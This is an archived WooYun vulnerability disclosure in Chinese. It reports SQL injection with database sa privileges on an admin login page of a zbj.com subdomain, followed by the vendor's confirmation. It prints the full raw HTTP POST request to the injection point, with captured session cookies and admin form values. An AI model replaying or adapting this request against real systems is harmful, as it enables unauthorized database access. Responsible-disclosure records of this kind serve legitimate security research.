乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2016-04-20: 细节已通知厂商并且等待厂商处理中 2016-04-20: 厂商已经确认,细节仅向厂商公开 2016-04-30: 细节向核心白帽子及相关领域专家公开 2016-05-10: 细节向普通白帽子公开 2016-05-20: 细节向实习白帽子公开 2016-06-04: 细节向公众公开
猪八戒某站SQL注入(影响多个数据库)
URL:
http://ys.zbj.com/
注入点:
http://ys.zbj.com/admin/login.aspx
POST /admin/login.aspx HTTP/1.1Host: ys.zbj.comUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateReferer: http://ys.zbj.com/admin/login.aspxCookie: _uq=18241e35bac5b8b2e8601d03d463bca4; __utma=168466538.314760027.1460619295.1461073714.1461076825.5; __utmz=168466538.1460619428.2.2.utmcsr=baidu|utmccn=(organic)|utmcmd=organic; defaultShowUser=1; defaultShowService=1; _ga=GA1.2.314760027.1460619295; _analysis=b6fe8TFefXhUuvqCSEDxNOCQ0fNrIYfLoDprla6W%2BK%2B6GEzN5DJzysQEim7Ie9U%2BDlZ2FSTuSEix58aKj9q8jI8ad7YPP1IHwylQ2NQdt5zUru8BBzJJVrqHjt7zt1YywmnnuMmhG1rShMS%2FWoHSsym6wyMDt97Z%2B%2B6fOxSU9DIZYSRaDEHgBHvQnCZwRntuCxj3rh3gsJMFudgaU4rhywm%2B; fvtime=313d1rpVkRd6irLGWoo0CZ8LOrt2kZwg%2Bq6wnjl%2BIYzfqAR7Ss3f; [email protected]; intlang=cn; ASP.NET_SessionId=nl1bc3dkg55pnzhs5khe0a2o; CNZZDATA1253200665=1225147171-1461060946-%7C1461060946; CNZZDATA1257731212=1111736398-1461061164-%7C1461061164; IESESSION=alive; pgv_pvi=1889716224; pgv_si=s5064029184; tencentSig=5519374336; uniqid=6119ec21e3d4f42a5fadc546ac3173d4; __utmc=168466538Connection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 321__VIEWSTATE=%2FwEPDwUJMjc1NDAxNTM4ZBgBBR5fX0NvbnRyb2xzUmVxdWlyZVBvc3RCYWNrS2V5X18WAQUIY2tvbmxpbmWJXcg1GuvRBUvuJ0%2F0Y%2B9jSsxa66v5nb71LsZFF%2BwuUw%3D%3D&__EVENTVALIDATION=%2FwEWBQL2%2F9yfBwLEhISFCwKd%2B7qdDgKagKOQCgLmrOjlAZY7ghVs8K%2Bx0OUPCorFtmtC5vJP9fUmiArVgaDAbFE0&TenantId=&txtName=admin&txtPwd=admin&txtAutoCode=4083
1:注入
2:数据库sa权限
3:影响数据库
1:给你几个站,你怎么能保证他不出问题?2:你的人生理想是什么?呵呵
危害等级:中
漏洞Rank:8
确认时间:2016-04-20 09:00
感谢@catchermana 的反馈,问题真实存在。我们已着手修复。PS:此网站为投资公司网站,不影响猪八戒网主站用户信息。对于你提到的修复方案,有机会在进一步交流。
暂无